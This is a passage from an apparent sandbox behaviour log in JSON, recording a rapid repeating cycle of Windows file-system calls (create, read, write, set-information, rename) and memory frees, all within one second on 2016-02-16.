"2016-02-16 17:41:53,048", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,048", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,058", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,058", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:53,058", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,058", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,068", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,068", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,068", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,068", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,068", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,068", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,078", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,078", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,078", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,078", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,078", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,078", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,078", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,078", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:53,088", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,088", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,088", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,098", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,098", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,109", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,109", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,109", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,119", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,119", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,119", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,129", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,129", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,139", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,139", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,139", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,139", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,139", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,139", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,139", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,139", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,149", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,149", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,149", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,159", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,159", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,159", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,169", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:53,179", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,179", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,189", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,189", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,189", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,189", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,189", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,189", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,189", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,189", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:53,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,199", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,209", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,209", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,219", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,219", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:53,229", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,239", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,239", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,249", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,259", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,259", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:53,259", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,269", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,269", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:53,279", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,279", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,279", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,289", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,289", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,299", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,299", "api": "NtFreeVirtualMemory"}, {"category": 